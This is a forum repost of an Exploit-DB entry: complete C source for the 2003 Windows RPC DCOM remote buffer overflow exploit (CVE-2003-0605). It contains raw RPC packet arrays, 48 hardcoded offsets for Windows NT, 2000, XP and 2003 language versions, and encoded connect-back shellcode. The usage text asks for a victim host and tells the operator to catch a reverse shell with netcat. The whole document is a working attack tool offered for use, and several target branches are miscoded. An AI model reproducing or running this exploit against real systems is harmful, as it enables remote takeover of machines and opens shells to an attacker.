Exploit Microsoft Windows - 'RPC DCOM' Remote (2)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
70
Проверка EDB
  1. Пройдено
Автор
ANONYMOUS
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-2003-0605
Дата публикации
2003-07-30
C:
//////////////////////////////////////////////////////////////////////////
//
//   Windows RPC DCOM Remote Exploit with 48 TARGETS (Fixed)
//
//////////////////////////////////////////////////////////////////////////
// 
//            English - French - Chinese - Polish - German
//              Japanese - Korean - Mexican - Kenyan
//
//          Tks to all wolrd wide contributors (Public Property)
// 
//                 New Targets ? [email protected] 
//
//////////////////////////////////////////////////////////////////////////



#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#pragma comment(lib,"ws2_32")

#define DWORD unsigned long
WSADATA wsa;

unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00};

unsigned char request2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x5C,0x00,0x5C,0x00};

unsigned char request3[]={
0x5C,0x00
,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};



/* Myam add OFFSETS*/

char winntsp4eng[] = "\xe5\x27\xf3\x77"; /* English winNT sp4 */
char winntsp5cn[] = "\xcf\xda\xee\x77"; /* china winNT sp5 */
char winntsp6cn[] = "\xac\x0e\xf0\x77"; /* china winNT sp6 */
char winntsp6acn[] = "\xc3\xea\xf0\x77"; /* china NT sp6a */
char win2knosppl[] = "\x4d\x3f\xe3\x77"; /* polish win2k nosp ver 5.00.2195*/
char win2ksp3pl[] = "\x29\x2c\xe4\x77"; /* polish win2k sp3 - ver 5.00.2195 tested */
char win2ksp4sp[] = "\x13\x3b\xa5\x77"; /* spanish win2k sp4 */
char win2knospeng1[] = "\x74\x16\xe8\x77"; /* english win2k nosp 1 */
char win2knospeng2[] = "\x6d\x3f\xe3\x77"; /* english win2k nosp 2 */
char win2ksp1eng[] = "\xec\x29\xe8\x77"; /* english win2k sp1 */
char win2ksp2eng1[] = "\x2b\x49\xe2\x77"; /* english win2k sp2 1 */
char win2ksp2eng2[] = "\xb5\x24\xe8\x77"; /* english win2k sp2 2 */
char win2ksp3eng1[] = "\x7a\x36\xe8\x77"; /* english win2k sp3 1 */
char win2ksp3eng2[] = "\x5c\xfa\x2e\x77"; /* english win2k sp3 2 */
char win2ksp4eng[] = "\x9b\x2a\xf9\x77"; /* english win2k sp4 */
char win2knospchi[] = "\x2a\xe3\xe2\x77"; /* china win2k nosp */
char win2ksp1chi[] = "\x8b\x89\xe6\x77"; /* china win2k sp1 */
char win2ksp2chi[] = "\x2b\x49\xe0\x77"; /* china win2k sp2 */
char win2ksp3chi[] = "\x44\x43\x42\x41"; /* china win2k sp3 */
char win2ksp4chi[] = "\x29\x4c\xdf\x77"; /* china win2k sp4 */
char win2ksp3ger[] = "\x7a\x88\x2e\x77"; /* german win2k sp3 */
char win2knospjap[] = "\xe5\x27\xf3\x77"; /* Japanese win2k nosp */
char win2ksp1jap[] = "\x8b\x89\xe5\x77"; /* Japanese win2k sp1 */
char win2ksp2jap[] = "\x2b\x49\xdf\x77"; /* japanese win2k sp2 */
char win2knospkr[] = "\x2a\xe3\xe1\x77"; /* Korea win2k nosp */
char win2ksp1kr[] = "\x8b\x89\xe5\x77"; /* Korea win2k sp1 same offset as win2kjp_sp1 ??*/
char win2ksp2kr[] = "\x2b\x49\xdf\x77"; /* Korea win2k sp2 */
char win2knospmx[] = "\x2a\xe3\xe1\x77"; /* Mexican win2k nosp */
char win2ksp1mx[] = "\x8b\x89\xe8\x77"; /* Mexican win2k sp1 */
char win2knospken[] = "\x4d\x3f\xe3\x77"; /* Kenya win2k sp1 */
char win2ksp1ken[] = "\x8b\x89\xe8\x77"; /* Kenya win2k sp1 */
char win2ksp2ken[] = "\x2b\x49\xe2\x77"; /* Kenya win2k sp1 */
char winxpnospeng[] = "\xe3\xaf\xe9\x77"; /* english xp nosp ver 5.1.2600 */
char winxpsp1eng1[] = "\xba\x26\xe6\x77"; /* english xp sp1 1 */
char winxpsp1eng2[] = "\xdb\x37\xd7\x77"; /* english xp sp1 2 */
char winxpsp2eng[] = "\xbd\x73\x7d\x77"; /* english xp sp2 */
char win2k3nospeng[] = "\xb0\x54\x22\x77"; /* english win2k3 */
char Win2ksp3ger[] = "\x29\x2c\xe3\x77"; /* Germanh win2 sp3 */
char Win2ksp4ger1[] = "\x29\x4c\xe0\x77"; /* German win2 sp4 1 */
char Win2ksp4ger2[] = "\x56\xc2\xe2\x77"; /* German win2 sp4 2 */
char winxpsp1ger[] = "\xfc\x18\xd4\x77"; /* German xp sp1 */
char Win2ksp1fr[] = "\x4b\x3e\xe4\x77"; /* French win2k Server SP1 */
char Win2ksp4fr[] = "\x56\xc2\xe2\x77"; /* French win2k Server SP4 */
char winxpsp0fr[] = "\x4a\x75\xd4\x77"; /* French win xp no sp */
char winxpsp1fr[] = "\xfc\x18\xd4\x77"; /* French win xp sp 1 */
char win2ksp3big[] = "\x25\x2b\xaa\x77";
char win2ksp4big[] = "\x29\x4c\xdf\x77";
char winxpsp01big[] = "\xfb\x7b\xa1\x71";



/* Test this offset
( Japanese Windows 2000 Pro SP2 ) : 0x77DF492B
Windows 2000 (no-service-pack) English 0x77e33f6d
0x77f92a9b
0x77e2afc5
0x772254b0 win2k3
0x77E829E3 / 0x77E83587 kokanin win2k sp3
*/ 
unsigned char sc[]=
"\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
"\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
"\x46\x00\x58\x00\x46\x00\x58\x00"


"\x29\x4c\xdf\x77" //sp4
//"\x29\x2c\xe2\x77"//0x77e22c29


"\x38\x6e\x16\x76\x0d\x6e\x16\x76" //??????????


"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01"
"\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30"
"\x93\x40\xe2\xfa"
// code 
"\x7b\xe4\x93\x93\x93\xd4\xf6\xe7\xc3\xe1\xfc\xf0\xd2\xf7\xf7\xe1"
"\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xdf\xfa\xf1\xe1\xf2\xe1\xea\xd2"
"\x93\xd0\xe1\xf6\xf2\xe7\xf6\xc3\xe1\xfc\xf0\xf6\xe0\xe0\xd2\x93"
"\xd0\xff\xfc\xe0\xf6\xdb\xf2\xfd\xf7\xff\xf6\x93\xd6\xeb\xfa\xe7"
"\xc7\xfb\xe1\xf6\xf2\xf7\x93\xe4\xe0\xa1\xcc\xa0\xa1\x93\xc4\xc0"
"\xd2\xc0\xe7\xf2\xe1\xe7\xe6\xe3\x93\xc4\xc0\xd2\xc0\xfc\xf0\xf8"
"\xf6\xe7\xd2\x93\xf0\xff\xfc\xe0\xf6\xe0\xfc\xf0\xf8\xf6\xe7\x93"
"\xf0\xfc\xfd\xfd\xf6\xf0\xe7\x93\xf0\xfe\xf7\x93\xc9\xc1\x28\x93"
"\x93\x63\xe4\x12\xa8\xde\xc9\x03\x93\xe7\x90\xd8\x78\x66\x18\xe0"
"\xaf\x90\x60\x18\xe5\xeb\x90\x60\x18\xed\xb3\x90\x68\x18\xdd\x87"
"\xc5\xa0\x53\xc4\xc2\x18\xac\x90\x68\x18\x61\xa0\x5a\x22\x9d\x60"
"\x35\xca\xcc\xe7\x9b\x10\x54\x97\xd3\x71\x7b\x6c\x72\xcd\x18\xc5"
"\xb7\x90\x40\x42\x73\x90\x51\xa0\x5a\xf5\x18\x9b\x18\xd5\x8f\x90"
"\x50\x52\x72\x91\x90\x52\x18\x83\x90\x40\xcd\x18\x6d\xa0\x5a\x22"
"\x97\x7b\x08\x93\x93\x93\x10\x55\x98\xc1\xc5\x6c\xc4\x63\xc9\x18"
"\x4b\xa0\x5a\x22\x97\x7b\x14\x93\x93\x93\x10\x55\x9b\xc6\xfb\x92"
"\x92\x93\x93\x6c\xc4\x63\x16\x53\xe6\xe0\xc3\xc3\xc3\xc3\xd3\xc3"
"\xd3\xc3\x6c\xc4\x67\x10\x6b\x6c\xe7\xf0\x18\x4b\xf5\x54\xd6\x93"
"\x91\x93\xf5\x54\xd6\x91\x28\x39\x54\xd6\x97\x4e\x5f\x28\x39\xf9"
"\x83\xc6\xc0\x6c\xc4\x6f\x16\x53\xe6\xd0\xa0\x5a\x22\x82\xc4\x18"
"\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xce"
"\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6"
"\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd7"
"\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4"
"\x7f\x19\x95\xd5\x17\x53\xe6\x6a\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca"
"\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";

unsigned char request4[]={
0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};

int main(int argc,char ** argv)
{

int len, len1, sockfd;
short port=135;
struct hostent *he;
struct sockaddr_in their_addr;


unsigned char buf1[0x1000];
unsigned char buf2[0x1000];
unsigned short port1;


DWORD cb;


WSAStartup(MAKEWORD(2,0),&wsa);


printf("OC192 RPC DCOM Remote Exploit BSD/Linux Port, thanks LSD and XFORCE\n");
printf("RPC DCOM Remote Exploit modified by www.k-otiK.com ;>\n");


if(argc<5)
{

printf("[<$>] RPC Remote Windows Exploit\n");
printf("[<$>] Modified by www.k-otiK.com - New Exploits Database\n");
printf("[<$>] Thanks to [email protected] + Jørgen_Haaø + woutiir \n");
printf("[<$>] Usage: %s <victim> <connectback ip> <cb port> <target>\n",argv[0]);
printf("[<$>] On connect back nc -lp cbport\n");
printf("[<$>] Targets: 0 WinNT English +sp4\n");
printf("[<$>] 1 WinNT China +sp5\n");
printf("[<$>] 2 WinNT China +sp6\n");
printf("[<$>] 3 WinNT China +sp6a\n");
printf("[<$>] 4 Win2k Polish nosp ver 5.00.2195\n");
printf("[<$>] 5 Win2k Polish +sp3 ver 5.00.2195\n");
printf("[<$>] 6 Win2k Spanish +sp4\n");
printf("[<$>] 7 Win2k English nosp 1\n");
printf("[<$>] 8 Win2k English nosp 2\n");
printf("[<$>] 9 Win2k English +sp1\n");
printf("[<$>] 10 Win2k English +sp2 1\n");
printf("[<$>] 11 Win2k English +sp2 2\n");
printf("[<$>] 12 Win2k English +sp3 1\n");
printf("[<$>] 13 Win2k English +sp3 2\n");
printf("[<$>] 14 Win2k English +sp4\n");
printf("[<$>] 15 Win2k China nosp\n");
printf("[<$>] 16 Win2k China +sp1\n");
printf("[<$>] 17 Win2k China +sp2\n");
printf("[<$>] 18 Win2k China +sp3\n");
printf("[<$>] 19 Win2k China +sp4\n");
printf("[<$>] 20 Win2k German +sp3\n");
printf("[<$>] 21 Win2k Japanese nosp\n");
printf("[<$>] 22 Win2k Japanese +sp1\n");
printf("[<$>] 23 Win2k Japanese +sp2\n");
printf("[<$>] 24 Win2k Korea nosp\n");
printf("[<$>] 25 Win2k Korea +sp1\n");
printf("[<$>] 26 Win2k Korea +sp2\n");
printf("[<$>] 27 Win2k Mexican nosp\n");
printf("[<$>] 28 Win2k Mexican +sp1\n");
printf("[<$>] 29 Win2k Kenya nosp\n");
printf("[<$>] 30 Win2k Kenya +sp1\n");
printf("[<$>] 31 Win2k Kenya +sp2\n");
printf("[<$>] 32 WinXP English nosp ver 5.1.2600\n");
printf("[<$>] 33 WinXP English +sp1 1\n");
printf("[<$>] 34 WinXP English +sp1 2\n");
printf("[<$>] 35 WinXP English +sp2\n");
printf("[<$>] 36 Win2k3 English nosp\n");
printf("[<$>] 37 Win2k german sp3\n");
printf("[<$>] 38 Win2k german sp4\n");
printf("[<$>] 39 Win2k german sp4 2\n");
printf("[<$>] 40 Winxp german sp1 2\n");
printf("[<$>] 41 Win2k french sp1\n");
printf("[<$>] 42 Win2k french sp4\n");
printf("[<$>] 43 Winxp french sp0\n");
printf("[<$>] 44 Winxp french sp1\n");
printf("[<$>] 45 Win2k big5 sp3\n");
printf("[<$>] 46 Win2k big5 sp4\n");
printf("[<$>] 47 Winxp big5 sp0\n");


exit(1);
}


if ((he=gethostbyname(argv[1])) == NULL) { // get the host info

perror("gethostbyname");

exit(1);

}

if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {

perror("socket");

exit(1);

}


their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(port);
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(their_addr.sin_zero), '\0', 8);


if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct 
sockaddr)) == -1) {
printf("Sorry, cannot connect to %s. Try again...\n", argv[1]);

exit(1);
}



if(atoi(argv[4])==0)

memcpy(sc+36,winntsp4eng,sizeof(winntsp4eng));
else if (atoi(argv[4])==1)
memcpy(sc+36,winntsp5cn,sizeof(winntsp5cn));
else if (atoi(argv[4])==2)
memcpy(sc+36,winntsp6cn,sizeof(winntsp6cn));
else if (atoi(argv[4])==3)
memcpy(sc+36,winntsp6acn,sizeof(winntsp6acn));
else if (atoi(argv[4])==4)
memcpy(sc+36,win2knosppl,sizeof(win2knosppl));
else if (atoi(argv[4])==5)
memcpy(sc+36,win2ksp3pl,sizeof(win2ksp3pl));
else if (atoi(argv[4])==6)
memcpy(sc+36,win2ksp4sp,sizeof(win2ksp4sp));
else if (atoi(argv[4])==7)
memcpy(sc+36,win2knospeng1,sizeof(win2knospeng1));
else if (atoi(argv[4])==8)
memcpy(sc+36,win2knospeng2,sizeof(win2knospeng2));
else if (atoi(argv[4])==9)
memcpy(sc+36,win2ksp1eng,sizeof(win2ksp1eng));
else if (atoi(argv[4])==10)
memcpy(sc+36,win2ksp2eng1,sizeof(win2ksp2eng1));
else if (atoi(argv[4])==11)
memcpy(sc+36,win2ksp2eng2,sizeof(win2ksp2eng2));
else if (atoi(argv[4])==12)
memcpy(sc+36,win2ksp3eng1,sizeof(win2ksp3eng1));
else if (atoi(argv[4])==13)
memcpy(sc+36,win2ksp3eng2,sizeof(win2ksp3eng2));
else if (atoi(argv[4])==14)
memcpy(sc+36,win2ksp4eng,sizeof(win2ksp4eng));
else if (atoi(argv[4])==15)
memcpy(sc+36,win2knospchi,sizeof(win2knospchi));
else if (atoi(argv[4])==16)
memcpy(sc+36,win2ksp1chi,sizeof(win2ksp1chi));
else if (atoi(argv[4])==17)
memcpy(sc+36,win2ksp2chi,sizeof(win2ksp2chi));
else if (atoi(argv[4])==18)
memcpy(sc+36,win2ksp3chi,sizeof(win2ksp3chi));
else if (atoi(argv[4])==19)
memcpy(sc+36,win2ksp4chi,sizeof(win2ksp4chi));
else if (atoi(argv[4])==20)
memcpy(sc+36,win2ksp3ger,sizeof(win2ksp3ger));
else if (atoi(argv[4])==21)
memcpy(sc+36,win2knospjap,sizeof(win2knospjap));
else if (atoi(argv[4])==22)
memcpy(sc+36,win2ksp1jap,sizeof(win2ksp1jap));
else if (atoi(argv[4])==23)
memcpy(sc+36,win2ksp2jap,sizeof(win2ksp2jap));
else if (atoi(argv[4])==24)
memcpy(sc+36,win2knospkr,sizeof(win2knospkr));
else if (atoi(argv[4])==25)
memcpy(sc+36,win2ksp1kr,sizeof(win2ksp1kr));
else if (atoi(argv[4])==26)
memcpy(sc+36,win2ksp2kr,sizeof(win2ksp2kr));
else if (atoi(argv[4])==27)
memcpy(sc+36,win2knospmx,sizeof(win2knospmx));
else if (atoi(argv[4])==28)
memcpy(sc+36,win2ksp1mx,sizeof(win2ksp1mx));
else if (atoi(argv[4])==29)
memcpy(sc+36,win2knospken,sizeof(win2knospken));
else if (atoi(argv[4])==30)
memcpy(sc+36,win2ksp1ken,sizeof(win2ksp1ken));
else if (atoi(argv[4])==31)
memcpy(sc+36,win2ksp2ken,sizeof(win2ksp2ken));
else if (atoi(argv[4])==32)
memcpy(sc+36,winxpnospeng,sizeof(winxpnospeng));
else if (atoi(argv[4])==33)
memcpy(sc+36,winxpsp1eng1,sizeof(winxpsp1eng1));
else if (atoi(argv[4])==34)
memcpy(sc+36,winxpsp1eng2,sizeof(winxpsp1eng2));
else if (atoi(argv[4])==35)
memcpy(sc+36,winxpsp2eng,sizeof(winxpsp2eng));
else if (atoi(argv[4])==36)
memcpy(sc+36,win2k3nospeng,sizeof(win2k3nospeng));
else if (atoi(argv[4])==37) 
memcpy(sc+36,win2k3nospeng,sizeof(Win2ksp3ger));
else if (atoi(argv[4])==38) 
memcpy(sc+36,win2k3nospeng,sizeof(Win2ksp4ger1));
else if (atoi(argv[4])==39) 
memcpy(sc+36,win2k3nospeng,sizeof(Win2ksp4ger2));
else if (atoi(argv[4])==40) 
memcpy(sc+36,win2k3nospeng,sizeof(winxpsp1ger));
else if (atoi(argv[4])==41)
memcpy(sc+36,win2k3nospeng,sizeof(Win2ksp1fr));
else if (atoi(argv[4])==42)
memcpy(sc+36,win2k3nospeng,sizeof(Win2ksp4fr));
else if (atoi(argv[4])==43)
memcpy(sc+36,win2k3nospeng,sizeof(winxpsp0fr));
else if (atoi(argv[4])==44)
memcpy(sc+36,win2k3nospeng,sizeof(winxpsp1fr));
else if (atoi(argv[4])==45)
memcpy(sc+36,win2k3nospeng,sizeof(win2ksp3big));
else if (atoi(argv[4])==46)
memcpy(sc+36,win2k3nospeng,sizeof(win2ksp4big));
else if (atoi(argv[4])==47)
memcpy(sc+36,win2k3nospeng,sizeof(winxpsp01big));


port1 = htons(atoi(argv[3]));
port1 ^= 0x9393;
cb=inet_addr(argv[2]); 
cb ^= 0x93939393;
*(unsigned short *)&sc[330+0x30] = port1;
*(unsigned int *)&sc[335+0x30] = cb;
len=sizeof(sc);
memcpy(buf2,request1,sizeof(request1));
len1=sizeof(request1);

*(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sc)/2;
*(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sc)/2;
memcpy(buf2+len1,request2,sizeof(request2));
len1=len1+sizeof(request2);
memcpy(buf2+len1,sc,sizeof(sc));
len1=len1+sizeof(sc);
memcpy(buf2+len1,request3,sizeof(request3));
len1=len1+sizeof(request3);
memcpy(buf2+len1,request4,sizeof(request4));
len1=len1+sizeof(request4);
*(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+sizeof(sc)-0xc;

*(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+sizeof(sc)-0xc; 
*(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+sizeof(sc)-0xc;



if(send(sockfd, bindstr, sizeof(bindstr), 0)== -1){
printf("Send failed pussy.\n");
exit(1);
}

len=recv(sockfd,buf1,1000,0);
if (send(sockfd,buf2,len1,0)==SOCKET_ERROR) {

printf("Send failed pussy\n");
exit (1);
}
len=recv(sockfd,buf1,1024,0);
return 0;
}

// milw0rm.com [2003-07-30]
 
Источник
www.exploit-db.com

Похожие темы